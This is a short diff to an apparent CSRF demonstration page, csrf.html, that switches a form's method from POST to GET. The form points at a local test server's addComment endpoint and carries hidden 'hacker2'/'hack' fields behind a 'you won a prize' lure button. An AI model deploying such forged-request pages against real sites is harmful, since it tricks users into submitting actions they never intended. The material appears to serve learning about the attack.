--- a/server/csrf.html
+++ b/server/csrf.html
@@ -5,7 +5,7 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   </head>
   <body>
-    <form action="http://localhost:3000/addComment" method="POST">
+    <form action="http://localhost:3000/addComment" method="GET">
         <input type="hidden" name="name" value="hacker2" />
         <input type="hidden" name="comment" value="hack" />
         <button type="submit">中奖了</button>
